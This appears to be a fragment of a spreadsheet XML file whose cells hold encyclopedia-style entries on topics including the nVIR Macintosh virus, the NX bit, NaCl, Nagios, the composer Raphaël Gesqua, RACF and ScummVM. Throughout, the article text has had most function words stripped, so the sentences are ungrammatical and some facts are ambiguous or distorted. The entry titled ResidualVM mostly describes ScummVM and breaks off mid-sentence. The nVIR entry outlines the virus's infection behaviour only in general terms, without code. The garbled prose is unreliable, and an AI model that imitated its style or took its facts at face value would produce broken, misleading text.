    <t>nvir obsolete computer virus replicate macintosh computers running system version source code original nvir made widely available, numerous variants arisen. each variant causes somewhat different symptoms, application crashes, printing errors laser printers, slow system response time, unpredictable system crashes. nvir spreads nvir-infected program, long period time nvir lies basically dormant host system, nvir generally finds system backups detected first overt symptoms appear. example, disk used infected macintosh removed inserted second macintosh, machine become infected application disk executed second machine. further, method used transfer programs macintoshes spread nvir, including file transfer network. however, nvir cannot spread print network's hardware.nvir carries additional code resource, code (though variants carry code 255), patches jump table point original application's entry point saved nvir resource. nvir introduces system file init resource executed startup, time nvir patches teinit trap. application subsequently calling trap infected. nvir nvir resource copy init nvir resource system file prevent nvir infection. application calls openresfile prior teinit, application damaged. nvir resource holds counter 1000 first infection system. each reboot decrements counter each application launch decrements when counter reaches nvir beep reboots infected application launches. macintalk installed machine's system folder, machine occasionally "don't panic". otherwise, beep unexpectedly. nvir known 'hybridize' different variants nvir machine. references external links vaccine 'nvir' virus, mike scanlin, mactech 2020, mactech removed contents page. cached page might still exist here). os/nvir virus, mcafee nvir virus-test-center, university hamburg nvir virus-test-center, university hamburg nvir virus-test-center, university hamburg nvir countermeasures, berkeley</t>
  </si>
  <si>
    <t>NX bit</t>
  </si>
  <si>
    <t>(no-execute) technology used cpus segregate areas memory either storage processor instructions (code) storage data, feature normally found harvard architecture processors. however, increasingly used conventional neumann architecture processors security reasons. operating system support mark certain areas memory non-executable. processor refuse execute code residing areas memory. general technique, known executable space protection, also called write execute, used prevent certain types malicious software taking computers inserting code another program's data storage area running code within section; class attacks known buffer overflow attack. term originated advanced micro devices (amd), marketing term. intel markets feature (execute disable). architecture refers feature, introduced armv6, (execute never). term sometimes used describe similar technologies processors. architecture support processors, since 80286, included similar capability implemented segment level. however, almost operating systems 80386 later processors implement flat memory model, cannot capability. there 'executable' flag page table entry (page descriptor) processors, until, make capability available operating systems using flat memory model, added "no-execute" page table entry amd64 architecture, providing mechanism control execution page rather whole segment. intel implemented similar feature itanium (merced) processor—having ia-64 architecture—in 2001, bring popular processor families (pentium, celeron, xeon, etc.). architecture first implemented amd, bit, amd64 line processors, athlon opteron.after amd's decision include functionality amd64 instruction set, intel implemented similar feature processors beginning pentium processors based later iterations prescott core. specifically refers number (i.e. significant bit) 64-bit entry page table. code executed page; code cannot executed page, anything residing assumed data. available long mode (64-bit mode) legacy physical address extension (pae) page-table formats, x86's original 32-bit page table format page table entries format lack 63rd used disable enable execution. windows later support data execution prevention (dep). armv6, page table entry format introduced; includes "execute never" bit. armv8-a, vmsav8-64 block page descriptors, vmsav8-32 long-descriptor block page descriptors, stage translations "execute never" bits privileged unprivileged modes, block page descriptors stage translations single "execute never" bit(two bits armv8.2-tts2uxn feature); vmsav8-32 short-descriptor translation table descriptors level "execute never" bits privileged unprivileged mode level single "execute never" bit. alpha fourth edition alpha architecture manual, (now alpha fault execute page table entries openvms, tru64 unix, alpha linux palcode. sparc sparc reference sparc version permission values read only, read/write, read/execute, read/write/execute page table entries, although sparc processors sparc reference mmu. sparc version provide, required provide, combination read/write/execute permissions. translation table entry translation storage buffer oracle sparc architecture 2011, draft d1.0.0 separate executable writable bits. powerpc/power page table entries powerpc's hashed page tables no-execute page bit. page table entries radix-tree page tables power separate permission bits granting read/write execute access. pa-risc translation lookaside buffer (tlb) entries page table entries pa-risc pa-risc support read-only, read/write, read/execute, read/write/execute pages. itanium entries itanium support read-only, read/write, read/execute, read/write/execute pages. z/architecture twelfth edition z/architecture principles operation, z/architecture processors support instruction-execution protection facility, adds page table entries controls whether instructions given region, segment, page executed. also executable space protection references external links amd, intel antivirus tech chips microsoft interviewed trustworthy computing lkml announcement changes functionality microsoft windows service pack part memory protection technologies microsoft security developer center: windows execution protection</t>
  </si>
  <si>
    <t>NaCl (software)</t>
  </si>
  <si>
    <t>nacl (pronounced "salt") abbreviation "networking cryptography library", public domain "...high-speed software library network communication, encryption, decryption, signatures, etc".nacl created mathematician programmer daniel bernstein best known creation qmail curve25519. core team also includes tanja lange peter schwabe. main goal creating nacl, according paper, "avoid various types cryptographic disasters suffered previous cryptographic libraries". basic functions public-key cryptography signatures using ed25519. agreement using x25519. secret-key cryptography authenticated encryption using salsa20-poly1305. encryption using salsa20 aes. authentication using hmac-sha-512-256. one-time authentication using poly1305. low-level functions hashing using sha-512 sha-256 blake2 using libsodiumstring comparison. derivation function (only libsodium) password hashing using argon2 implementations reference implementation written often several inline assembler. python handled wrappers.nacl variety programming language bindings php, forms basis libsodium, cross-platform cryptography library created 2013 compatible nacl. alternative implementations libsodium portable, cross-compilable, installable, packageable, api-compatible version nacl. dryoc pure-rust implementation libsodium/nacl, support protected memory. nacl pharo pharo smalltalk extension. tweetnacl tiny library, fits tweets (140 symbols each), supports nacl functions. nacl port language. nacl javascript port tweetnacl/nacl cryptographic library javascript language. tweetnacl java port tweetnacl/nacl cryptographic library java language. sparknacl re-write tweetnacl spark subset, formal fully automatic proofs type safety correctness properties. crypt::nacl::sodium perl binding libsodium also comparison cryptography libraries list free open-source software packages references external links official website</t>
  </si>
  <si>
    <t>NaSHA</t>
  </si>
  <si>
    <t>nasha hash function accepted first round sha-3 candidate nist hash function competition. nasha designed smile markovski aleksandra mileva contributions simona samardziski (programmer) boro jakimovski (programmer). nasha supports internal state sizes 1024 2048 bits, arbitrary output sizes bits. uses quasigroup string transformations quasigroups order 264, defined extended feistel networks. quasigroups used every iteration compression function different depend processed message block. authors claim performance 23.06 cycles byte intel core 64-bit mode. cryptanalysis sha-3 competition indicated 384/512 version nasha susceptible collision attacks, authors disputed attacks also included small changes achieve strength 224/256 version. references external links official nasha website first round sha-3 candidates</t>
  </si>
  <si>
    <t>Naemon</t>
  </si>
  <si>
    <t>naemon open-source computer system monitoring, network monitoring infrastructure monitoring software application. naemon offers monitoring alerting services servers, switches, applications, services. alerts users things wrong alerts second time problem resolved. naemon created 2014 fork nagios.it available hat, centos, suse, debian ubuntu linux distribution. overview naemon open source software licensed provides: monitoring network services (smtp, pop3, http, nntp, ping, etc.). monitoring host resources (processor load, disk usage, etc.). simple plugin design allows users easily develop service checks. parallelized service checks. thruk monitoring webinterface. ability define network host hierarchies using 'parent' hosts, allowing detection distinction hosts unreachable. contact notifications service host problems occur resolved (via e-mail, pager, user-defined method plugin system). ability define event handlers service host events proactive problem resolution automatic file rotation support implementing redundant monitoring hosts also comparison network monitoring systems nagios icinga another nagios fork shinken (software) another nagios fork references external links official naemon website</t>
  </si>
  <si>
    <t>Nagios</t>
  </si>
  <si>
    <t>nagios core formerly known nagios, free open-source computer-software application monitors systems, networks infrastructure. nagios offers monitoring alerting services servers, switches, applications services. alerts users things wrong alerts second time problem resolved. ethan galstad group developers originally wrote nagios netsaint. 2015 actively maintain official unofficial plugins. nagios recursive acronym: "nagios ain't gonna insist sainthood" "sainthood" makes reference original name netsaint, changed response legal challenge owners similar trademark. "agios" "hagios") also transliterates greek word άγιος, means "saint". nagios originally designed linux, also runs unix variants. free software licensed terms general public license version published free software foundation. nagios agents nrpe nagios remote plugin executor (nrpe) nagios agent allows remote system monitoring using scripts hosted remote systems. allows monitoring resources disk usage, system load number users currently logged nagios periodically polls agent remote system using check_nrpe plugin. nrpe allows remotely execute nagios plugins linux/unix machines. this allows monitor remote machine metrics (disk usage, load, etc.). nrpe also communicate windows agent add-ons, execute scripts check metrics remote windows machines, well. 2020, nrpe deprecated. nrdp nagios remote data processor (nrdp) nagios agent flexible data transport mechanism processor. designed architecture allows easily extended customized. nrdp uses standard ports protocols (http xml) implemented replacement nagios service check acceptor (nsca). nsclient++ this program mainly used monitor windows machines. being installed remote system nsclient++ listens port 12489. nagios plugin used collect information addon called check_nt. nrpe, nsclient++ allows monitor so-called 'private services' (memory usage, load, disk usage, running processes, etc.) nagios host service monitor designed inform network problems. ncpa nagios cross platform agent open source project maintained nagios enterprises. ncpa installs windows, linux, created scale-able allows flexibility simplicity monitoring hosts. ncpa allows multiple checks memory usage, usage, disk usage, processes, services, network usage. active checks queried "ncpa listener" service passive checks sent "ncpa passive" service. nagios nagios proprietary interface using nagios core back-end, written maintained original author, ethan galstad, nagios enterprises. centos rhel currently supported operating systems. combines nagios core technologies. main database ndoutils module used alongside nagios core mysql. while front-end nagios core mainly php, nagios front-end back-end written including subsystem, event handlers, notifications, python used create capacity planning reports reports. rrdtool highcharts included create customizable graphs displayed dashboards. 2014 controversy plugins website january 2014, nagios enterprises redirected nagios-plugins.org domain server controlled nagios enterprises without explicitly notifying nagios plugins community team consequences actions. nagios enterprises replaced nagios-plugins team group new, different members. community team members replaced continued work name monitoring plugins along website domain monitoring-plugins.org. also check extension offloads work nagios core allows distributed monitoring comparison network monitoring systems icinga fork nagios core naemon fork nagios core nconf tool configuring nagios core shinken fork nagios core vigilo tool built nagios provides interfaces netxms used monitoring entire infrastructures, starting snmp-capable hardware, ending applications servers. references further reading barth, wolfgang; (2006) nagios: system network monitoring starch press isbn 1-59327-070-4 barth, wolfgang; (2008) nagios: system network monitoring, edition starch press isbn 1-59327-179-4 turnbull, james; (2006) nagios francisco: apress isbn 1-59059-609-9 josephsen, david; (2007) building monitoring infrastructure nagios prentice hall isbn 0-13-223693-1 dondich, taylor; (2006) network monitoring nagios o'reilly isbn 0-596-52819-1 external links official nagios website nagioscore github</t>
  </si>
  <si>
    <t>Raphaël Gesqua</t>
  </si>
  <si>
    <t>raphaël gesqua (born february 1972 paris) french composer, arranger sound designer. biography raphaël gesqua's professional career began video games industry, early 1990s, real name raphaël gesqua, previously known middle 16-bit demoscene, audiomonster pseudonym adopted 1989. composer worked game designers, paul cuisset, arranged soundtrack video game flashback, commodore amiga, 1992. game remained world's best selling french video game. also worked twice pierre adane, creator, among things, spin video games series, composed soundtracks snow bros video game, commodore amiga, 1991 (that production cancelled last minute legal reasons), 1993, nutz, side-scrolling platformer released super nes, mega drive/genesis game boy, great success went stock, days release. collaboration paul cuisset also continues immediately, composer entirely composed arranged music shaq-fu (featuring famous basketball player shaquille o'neal), fade black (direct sequel flashback), moto racer, sound director company delphine software international. fade black moto racer also got, addition music, sound effects entirely made gesqua. again, moto racer remained best world selling french videogame ever several years. after delphine software period, gesqua resumed status independent composer, created original music, sound effects, voices various titles, like marvel super heroes code lyoko, horse life, dodogo! series, island, cocoto series, many titles. island soundtrack (odenis studio) earned nomination milthon 2009 awards, best soundtrack. also composed music glory days glory days nominations site, 2007, best soundtrack, facing legend zelda phantom hourglass, nintendo game. from 2003, gesqua began career movies, worked several directors, fabrice blin, thomas lesourd, christophe monier, julien maury, directors julien maury alexandre bustillo, worked twice shorts. composed soundtrack first film duo, inside (2007 film) l'intérieur), horror film presented cannes film festival 2007, starring beatrice dalle, alysson paradis, nicolas duvauchelle, among others. this first experience resulted failure, producers rejected composer's work. second collaboration better one, 2010/2011, gesqua signs first soundtrack feature film, livid (livide) film, produced fabrique released theaters france, december 2011. double limited edition soundtrack released "kronos records" 2017. 2013, composer worked director fabrice blin, film documentary super madness, genesis super horror films france. composer also signed, beginning 2013, soundtrack english video game license, nimnims mickim games. 2014, worked again, also, directors julien maury alexandre bustillo, film among living yeux vivants. critical reception film's music excellent, united states first, sxsw austin, texas, film rated event famous fangoria, frequently praised music critics attended screening. parallel film's release, digital version soundtrack released publishers moviescore media "kronos records". music "among living" obtained nomination, 2015, "soundtrack geeks awards", category "best horror film music 2014".also 2014, raphaël gesqua composed soundtrack films anthology abcs death xylophone" segment), directed julien maury alexandre bustillo. 2015, raphaël works christophe monier, compose music feature film "that blood that will flow".in 2017, music feature film livide, julien maury alexandre bustillo, published limited double edition, kronos records.still 2017, raphaël composed soundtrack kirby guerre kirby), directed marc azéma jean depelley, france télévisions.he also worked music virtual reality videogame neon seoul outrun, playsnak company.last, raphaël worked christophe monier latest film grenade shirt (une grenade sous chemise), produced terra cinema, best music prize crash test film festival 2020, among prizes film.also 2018, composer hired company microïds re-orchestrate compose novel themes remake video game toki (juju densetsu japan), also realize sound design game.finally, 2018, raphaël gesqua named "member honor" mo5.com association, video game world personality supporting initiative.in 2019, composer hired company color dreams productions compose music spider, l'araignée rouge, first interactive feature film, initiated robert hossein, directed frank florino, starring tchéky karyo, laura smet, francis renaud, pascal elbe alessandra martines.in 2020, composed music feature film thing behind door, chose derrière porte, directed fabrice blin, well première ligne, another feature film, time directed francis renaud.also 2020, composer returned documentary world compose music jack kirby, d-day, sequel kirby war, still directed marc azéma jean depelley.the year, reunited julien maury alexandre bustillo, compose music feature film deep house. discography 2017 livide livid original film soundtrack ("kronos records") 2014 among living yeux vivants original film soundtrack (moviescore media "kronos records") 1996 fade black original video game soundtrack (sony music delphine records) 1996 mega video game music (videogames music compilation featuring fade black mr.nutz) films feature films 2006: inside l'intérieur), directed julien maury alexandre bustillo, produced fabrique films (rejected producers) 2011: livid (livide), directed julien maury alexandre bustillo, produced fabrique 2013: super madness, directed fabrice blin vincent leyour, produced metaluna productions 2014: among living (aux yeux vivants), directed julien maury alexandre bustillo, produced metaluna productions 2014: abcs death xylophone" segment), directed julien maury alexandre bustillo, produced metaluna productions 2015: that blood which will flow sang couler, directed christophe monier, produced sentinelles eternelles 2019: spider l'araignée rouge, directed frank florino, produced color dreams productions 2020: thing behind door chose derrière porte, directed fabrice blin, produced fabrice lambot 2020: front line/première ligne, directed francis renaud, produced francis renaud 2021: deep house (the deep house), directed julien maury alexandre bustillo, produced radar films short films 2003: pizza hunt pizza l'oeil, directed julien maury, produced corporation 2005: pedro, directed julien maury, produced julien françois maury 2005: lifeline ligne vie, directed bruno marion, produced codicentre 2005: forbidden territory territoire interdit, directed christophe monier, produced films 2007: aedea, directed manuel garcia 2007: mister evil monsieur méchant, directed fabrice blin, produced group 2008: fake leader price spot fausse publicité leader price, directed kevin lecomte 2008: when mommy gone quand maman sera partie, directed christophe monier, produced takami productions/arte 2009: blue fighters combattants bleus, directed christophe monier, produced sentinelles eternelles 2010: mandragore, directed fabrice blin, produced metaluna productions 2018: grenade shirt, directed christophe monier, produced terra cinema series 2007 howard tome created thomas lesourd, produced films cartel thomas lesourd 2008 howard tome created thomas lesourd, produced films cartel thomas lesourd video games 1989-1994: music composer amiga demoscene, handle audiomonster (aka raphaël gesqua) 1991: snow bros (unreleased) (amiga) 1992: flashback (amiga) 1993: jimmy's fantastic journey (amiga) 1993: nutz (super nes) 1994: shaq-fu (super nes) 1994: shaq-fu (mega drive/genesis) 1994: nutz (mega drive/genesis) 1994: nutz (game boy) 1995: fade black cd-rom) 1995: shaq-fu (commodore amiga) 1995: shaq-fu (game gear) 1996: fade black (playstation) 1996: mega video game music (music compilation) 1996: fade black (original videogame soundtrack) 1997: moto racer cd-rom) 1997: moto racer (playstation) 1998: moto racer (playstation, cd-rom sound effects delphine logo music only) 1999: nutz (game color) 1999: darkstone: evil reigns cd-rom delphine logo music only) 1999: paperland cousteau (unreleased) cd-rom) 2000: moto racer world tour (playstation sound effects delphine logo music only) 2001: planet apes cd-rom) 2001: moto racer cd-rom delphine logo music only) 2001: h2overdrive (unreleased) (playstation 2001: dark stone evil reigns (playstation delphine logo music only) 2001: trackdown (unreleased) cd-rom, xbox) 2001: scape (unreleased) cd-rom, dreamcast) 2002: cars’n’girls (unreleased) (playstation cd-rom) 2002: planet apes (playstation) 2002: taxi cd-rom) 2002: sharp shooter cd-rom) 2003: cocoto platform jumper (playstation 2004: mouse trophy (playstation cd-rom) 2004: cocoto platform jumper (nintendo gamecube) 2004: cocoto kart racer (playstation 2004: cocoto kart racer (nintendo gamecube) 2005: rebel raiders operation nighthawk cd-rom) 2005: rebel raiders operation nighthawk (playstation 2005: fastlane carnage cd-rom) 2005: cocoto funfair (playstation cd-rom) 2005: crazy frog racer (playstation cd-rom) 2005: cocoto funfair (gamecube) 2005: franklin birthday surprise (playstation 2005: glory days (game advance) 2005: franklin birthday surprise (nintendo gamecube) 2005: super army (game advance) 2005: franklin's great adventures (nintendo 2005: cocoto kart racer (nintendo 2005: franklin's great adventures (game advance) 2006: crazy frog racer (playstation cd-rom) 2006: cocoto fishing master (playstation 2006: postman greendale rocket (game advance) 2006: legend dragon (playstation 2006: legend dragon (playstation portable) 2006: legend dragon (wii) 2006: minna kokoto kart (nintendo 2006: noddy magic book (playstation 2006: heracles battle gods (playstation 2006: heracles battle gods cd-rom) 2006: heracles battle gods (nintendo 2006: cocoto kart racer (game advance) 2006: arthur invisibles (nintendo 2007: code lyoko quest infinity (nintendo wii) 2007: cocoto platform jumper (game advance) 2007: heracles chariot racing (playstation 2007: cocoto racers (nintendo 2007: cocoto magic circus (wii) 2007: bratz ponyz (nintendo 2007: cocoto kart racer cd-rom) 2007: glory days (nintendo 2008: fade black (playstation 2008: rebel raiders operation nighthawk (wii) 2008: ellen whitaker's horse life (wii) 2008: code lyoko fall xana (nintendo 2008: bratz ponyz (nintendo 2008: ellen whitaker's horse life cd-rom) 2008: touch mechanic (nintendo 2008: cocoto kart racer (wii) 2008: horse life amis pour cd-rom) 2008: code lyoko quest infinity (playstation 2008: glory days attack hero (nintendo dsi) 2008: code lyoko quest infinity (playstation portable) 2008: horse life amis pour (wii) 2008: cocoto fishing master (wii) 2009: faceez (nintendo dsi) 2009: cocoto platform jumper" (wii) 2009: island (wii) 2009: cocoto festival (wii) 2009: kick party (wii) 2009: cocoto surprise (wii) 2009: heracles chariot racing (wii) 2009: heracles chariot racing (playstation portable) 2009: cocoto kart online (iphone) 2010: horse life adventures (wii) 2010: cocoto kart online! (ipad) 2010: dodogo! (nintendo dsi) 2010: cocoto magic circus (iphone) 2010: dodogo! challenge (nintendo dsi) 2010: cocoto magic circus online (ipad) 2010: western heroes (wii) 2010: island paperfield (nintendo dsi) 2010: marvel super heroes grandmaster challenge (wii) 2011: hidden path faery (pc) 2011: rising board (iphone) 2011: gunslingers (wii) 2011: glory days tactical defense (nintendo dsi) 2011: dodogo! robo (nintendo dsi) 2011: cocoto kart racer (nintendo wii) 2012: horses (nintendo 3ds) 2012: rising board (nintendo 3ds) 2013: hidden path faery (ipad) 2014: fish sharks (ios) 2015: nimnims (ios, android, osx, windows) 2017: neon seoul outrun (steam) 2018: toki (nintendo switch) 2021: asterix obelix slap all! (ps4, xbox one, nintendo switch, steam) awards nominations raphaël gesqua's first nomination awards (best original music category) raphaël gesqua's second nomination awards (best sound category) raphaël gesqua's nomination milthon 2009 awards (best original soundtrack category) raphaël gesqua's nomination soundtrack geek awards 2015 (best horror film score category) livide soundtrack best/most listened scores 2017, according strings magazine raphaël gesqua's best music prize crash test film festival 2020 (best original music category) references external links raphaël gesqua's official website raphaël gesqua imdb raphaël gesqua soundcloud raphaël gesqua's 2007 english interview game raphaël gesqua's 2007 english interview hugi magazine raphaël gesqua's 2014 french interview book l'histoire jeux vidéo france raphaël gesqua's 2014 english interview movie music international raphaël gesqua's 2014 french interview sci-fi universe raphaël gesqua's 2014 french interview movies pifff 2014 raphaël gesqua's 2014 french interview cinegenik raphaël gesqua's 2014 french interview gangeek style</t>
  </si>
  <si>
    <t>Resource Access Control Facility</t>
  </si>
  <si>
    <t>introduction racf, [pronounced rack-eff] short resource access control facility, software product. security system provides access control auditing functionality z/os z/vm operating systems. racf introduced 1976. originally called racf renamed z/os security server (racf) although mainframe folks still refer racf.its main features are: identification verification user user password check (authentication) identification, classification protection system resources maintenance access rights protected resources (authorization) controlling means access protected resources logging accesses protected system protected resources (auditing)racf establishes security policies rather permission records. permissions file patterns permissions even files exist. those permissions used file object) created later time community there long established technical support community racf based around listserv operated university georgia. list called racf-l described racf discussion list. email address listserv racf-l@listserv.uga.edu also viewed webportal https://listserv.uga.edu/scripts/wa-uga.exe books first text book published (first printing december 2007) aimed giving security professionals introduction concepts conventions racf designed administered mainframe basics security professionals: getting started racf pomerantz (author), barbara vander weele (author), mark nelson (author), hahn (author). evolution racf continuously evolved support modern security features digital certificates/public infrastructure services, ldap interfaces, case sensitive ids/passwords. latter reluctant concession promote interoperability systems, unix linux. underlying zseries (now hardware works closely racf. example, digital certificates protected within tamper-proof cryptographic processors. major mainframe subsystems, especially db2, racf provide multi-level security (mls). primary competitors acf2 topsecret, produced technologies. references external links what racf? racf overview</t>
  </si>
  <si>
    <t>Name Service Switch</t>
  </si>
  <si>
    <t>name service switch (nss) connects computer variety sources common configuration databases name resolution mechanisms. these sources include local operating system files (such /etc/passwd, /etc/group, /etc/hosts), domain name system (dns), network information service (nis, nis+), ldap. this operating system mechanism, used billions computers, including unix-like operating systems, indispensable functioning part networked organization internet. among things, invoked every time computer user clicks types website address browser responds password challenge authorized access computer internet. nsswitch.conf system administrator usually configures operating system's name services using file /etc/nsswitch.conf. this file lists databases (such passwd, shadow group), sources obtaining information. examples sources files local files, ldap lightweight directory access protocol, network information service, nisplus nis+, domain name system (dns), wins windows internet name service. nsswitch.conf file line entries service consisting database name first field, terminated colon, list possible source databases second field. typical file might look like: passwd: files ldap shadow: files group: files ldap hosts: files ethers: files netmasks: files networks: files protocols: files rpc: files services: files automount: files aliases: files order source databases determines order attempt look sources resolve queries specified service. bracketed list criteria specified following source name govern conditions proceed querying next source based preceding source's response. history earlier unix-like systems either accessed local files hard-coded rules accessing files network-stored databases. ultrix notable exception nearly identical functionality configuration file /etc/svc.conf. microsystems first developed solaris operating system. solaris' compliance svr4, microsystems at&amp;t unix system laboratories jointly developed merging unix system xenix, required third parties able plug name service implementations transport layer choosing (osi without rewriting svr4-compliant transport-independent (ti-rpc) applications rebuilding operating system. introduced nis+ directory service solaris supersede nis, required co-existence directory services within enterprise ease migration. engineers thomas maslen sanjay dani first design implement name service switch. they fulfilled solaris requirements nsswitch.conf file specification implementation choice load database access modules dynamically loaded libraries, also first introduce. engineers' original design configuration file runtime loading name service back-end libraries withstood test time operating systems evolved name services introduced. over years, programmers ported configuration file nearly identical implementations many operating systems including freebsd, netbsd, linux, hp-ux, irix aix. more decades invented, libc implements almost identically. also authentication group (database) name server pluggable authentication modules external links nsswitch.conf(5): name-service switch configuration file netbsd file formats manual name service switch implementation library module supporting ldap: nss_ldap another module supporting ldap: nss-ldapd module supporting afs: nss_afs</t>
  </si>
  <si>
    <t>ResidualVM</t>
  </si>
  <si>
    <t>script creation utility maniac mansion virtual machine (scummvm) game engine recreations. originally designed play lucasarts adventure games scumm system, also supports variety non-scumm games companies like revolution software adventure soft. originally written ludvig strigeus. released terms general public license, scummvm free software. scummvm re-implementation part software used interpret scripting languages games used describe game world rather emulating hardware games such, scummvm allows games supports played platforms originally released. team behind also improvements bug-fixes translations works commercial companies gog.com re-releases. features scummvm program supports numerous adventure game engines virtual machines, allowing user play supported adventure games platform choice. scummvm provides none original assets games supports, expects user properly original game's media software legally. official project website offers games freeware work directly scummvm. atop reimplementing game executables portable form, scummvm enables players save load state emulator time, enabling save system atop whatever emulated game provide. also begun work providing alternate controls newer devices, mobile devices touch screens, work atop original games.while scummvm appears function equivalently game emulator, scummvm team consider such. outside subsystems like audio engines forced rely emulation, scummvm recreates game engines older languages portable code, high-level opcodes game's assets execute manner original release, improving portability scummvm numerous platforms. scummvm team consider improvement simply running older games executables operating system emulator, dosbox, since scummvm's implements lightweight require less processing power memory, allowing limited processing environments like mobile devices. ports portability design goal project. ports scummvm available microsoft windows, macos variety unix-like systems including linux (based rpm, debian, source), members family (freebsd, netbsd, openbsd, dragonfly bsd) solaris. also ported console systems. less mainstream personal computer ports include amiga, atari-freemint, haiku-beos-zeta, risc os/2 (including derivatives arcaos). variety game consoles official ports. scummvm ported gaming machines playstation playstation dreamcast, nintendo gamecube, wii, handheld consoles including zero, gp2x, nintendo pandora, playstation portable vita. handheld computer platforms supported include palm tapwave zodiac, symbian (uiq platform, nokia nokia 7710 phone series), nokia's internet tablet (used nokia 770, n800 n810), apple's iphone, motomagx, motoezx phones windows mobile. platforms supported unofficial scummvm ports include microsoft's xbox gaming console, blackberry playbook, zaurus, gizmondo gp32 portable device platforms. mobile phones running android, webos unofficial samsung's bada also supported. history work scummvm started september 2001 (with first public release october site launch november) computer science student ludvig strigeus. looking write adventure game, looked mechanics existing game engine, specifically working create emulator play monkey island time, vincent hamm also looking develop scumm emulator, though done deeper research understanding scumm engine worked, found strigeus much along, joined craft emulator. while strigeus finished required emulation monkey island hamm worked separately prepare engine indiana jones fate atlantis, completed, found dis-coordination efforts eventually emulator working games.news scummvm picked tech news website slashdot november 2001, drawing large interest project, several developers became part project help support games. these developers often turned creators original games obtain information informal ways, help create emulation. further developers helped support games scumm, adventure soft's simon sorcerer; debate changing name program point, ultimately kept scummvm title, believing scumm well-recognized adventure game engine. strigeus built support imuse, sound software used many lucasarts games, feared including potential backlash lucasarts. other developers project advised legal issues eventually included. though strigeus hamm would leave project 2002, large enough development team allow grow, james "ender" brown. following shift, engine's source code changed c++, graphical user interface (gui) added.with increased awareness project, lucasarts sent cease desist letter project, believing using lucasarts' proprietary code. brown worked next four years lucasarts' legal representatives explain nature emulator source information demonstrate created legal. brown considered lucasarts trying accommodating scummvm helped raise interest titles. they ultimately came legal agreement allow scummvm continue developed.the project would also incorporate parallel efforts make game emulators adventure games. games sierra online high demand project, requiring emulate adventure game interpreter (agi) advanced sierra's creative interpreter (sci) engines. support added 2006 incorporating efforts sarien project, efforts support hampered parallel project, freesci. though scummvm freesci aimed reverse engineer workings sci, freesci stated took clean-room approach avoid legal question reverse engineering, believed scummvm project afoul sierra's approaches thus hesitant work together. however, freesci began languish interest compared scummvm; developer took upon make freesci engine work scummvm, freesci participation project, agreed merge efforts scummvm. initial support subsequently released 2010 version scummvm.scummvm continues games game engines, though process create relatively slow. according team's project lead eugene sandulenko 2017), game engines chosen inclusion scummvm either given source code makes easy port software's architecture, team members passionate bringing game engine program difficult task reconstructing game's code compiled versions. restriction scummvm include game engines, leaving games handled sister project residualvm. version scummvm released december 2017, adding support several full motion video games obscure titles, full pipe plumbers don't wear ties. with release, scummvm support different game engines.since around december 2017, scummvm working support macromedia director coordination original developers. macromedia director used many mid-1990s video games journeyman project. august 2021, first versions scummvm director support released, team continuing work improving performance.an attempt bring another world éric chahi brought internal stress within project 2004. another world point-and-click adventure game, used polygon-based graphics instead pixel-based ones adventure games employ, thus considered serious departure focus scummvm. though project scrapped days chahi requested removal preparing 15th anniversary remastered sale, current leads project refocus group define ideals scummvm meet.scummvm also difficulty bringing games using adventure game studio (ags), used frequently indie adventure games, blackwell series. while source code open developer chris jones 2010, scummvm team large backlash complaints developers using engine games, stating want games scummvm. eventually couple years later tested development build, request public beta test thousands newly supported games, v2.5+ games officially added program, coinciding 20th anniversary october 2021.scummvm participant google summer code every year since 2007 except 2015. sister project, residualvm, started implement engines three-dimensional adventure games, grim fandango myst iii: exile, named games reflect residual already covered scummvm. late 2020, announced residualvm officially merging scummvm. this completed version release, coinciding program's 20th anniversary october 2021. developer support according sandulenko "there typical process" comes collaboration developers, "everything ad-hoc. what search contact info people working titles developer interested we’re inquiring access original source code, still exists somewhere. then start working pace."with increased attention, scummvm entered favorable agreements adventure game developers help bring titles engine, cases, given source code assets work from. revolution software helped developers source code technical advice games, scummvm supported company's virtual theatre engine, revolution released lure temptress beneath steel freeware provided assets first broken sword games open media format. renewed interest games younger players enabled revolution work broken sword games. other developers worked closely scummvm include: adventure soft: provided original source code adventure games, simon sorcerer, feeble files elvira series. alcachofa soft: emilio aragón released original source code adventure game drascula: vampire strikes back freeware. creative reality: neil dodwell david creative reality released original source code adventure dreamweb, cd-rom floppy disk versions game freeware, available download scummvm website. gray design associates: david gray provided original source code hugo trilogy interactive binary illusions: released cd-rom floppy disk version adventure game, flight amazon queen freeware available download scummvm website. laboratorium komputerowe avalon: janusz wiśniewski miroslaw liminowicz released original source code adventure game sołtys freeware, available download scummvm website. perfect entertainment: john young, colin smythe terry pratchett provided original source code adventure games, discworld discworld missing presumed...!?. wyrmkeep entertainment: pearce provided original source code adventure game, inherit earth: quest orb.the digital storefront gog.com specializes selling digital copies older games, provides support scummvm, sells titles include scummvm engine part distribution. disney, owns rights lucasarts adventure games, released maniac mansion steam running scummvm. development operation stealth future wars support added integrating another stand-alone recreation engine: cine. trollvm also integrated scummvm adding support three pre-agi games: mickey's space adventure, troll's tale, winnie pooh hundred acre wood. mistic's violations scummvm distributed free software gpl-2.0-or-later license, enabling anyone project engine game. example, revolution software repackaged broken sword games release, using scummvm included sword1 sword2 engines support modern computers.in december 2008, scummvm team learned recently released ports three humongous entertainment junior adventure titles, freddi fish case missing kelp seeds, pajama sam: need hide when it's dark outside, fox: cereal, used scummvm engine without proper attribution. games published request atari majesco entertainment, turned mistic software port games. mistic used scummvm these, failed credit developers. while scummvm team contacted gpl-violations.org legal advice, atari instead threatened scummvm team, terms nintendo development heavily restricted open source software, including gpl. settlement made 2009, scummvm would drop investigation violation, condition mistic would sell destroy gpl-violating copies games, make donation free software foundation, legal fees. result, legal dispute significantly limited availability ports three titles. residualvm residualvm (formerly residual) cross-platform computer program comprising game engine recreations common graphical user interface. supports grim fandango, myst iii: exile, longest journey. merged scummvm october 2020.residualvm originally designed play lucasarts adventure games grime game engine, later adapted support ones. like scummvm, residualvm stood virtual machine.residualvm reimplementation part software used interpret scripting languages conducting reverse engineering original game rather emulating hardware games ran. such, residualvm allows games supports played platforms originally released. name project comes fact originally started support residual lucasarts adventure games supported scummvm. original lua-based engine used lucasarts adventure games called grime opposed scumm), residualvm's title also word grime type residue. project started former scummvm team leader james brown, first publicly available august 2003. progress project initially slow, result project's main goal supporting grim fandango occur april 2011, compatibility grim fandango upgraded "completable minor glitches".the project obtained domain separate scummvm december 2011. result domain name, project name changed residual residualvm. logo changed reflect name january 2012. first stable release residualvm released years project started, december 2012. merged scummvm october 2021. support residualvm officially available multiple platforms including windows, linux, amigaos irix. addition, android port available source code, unofficial builds made source. there also port available pandora console, freebsd, official added main branch. with increased attention, residualvm entered favorable agreements adventure game developers help bring titles engine. cyan worlds partnered 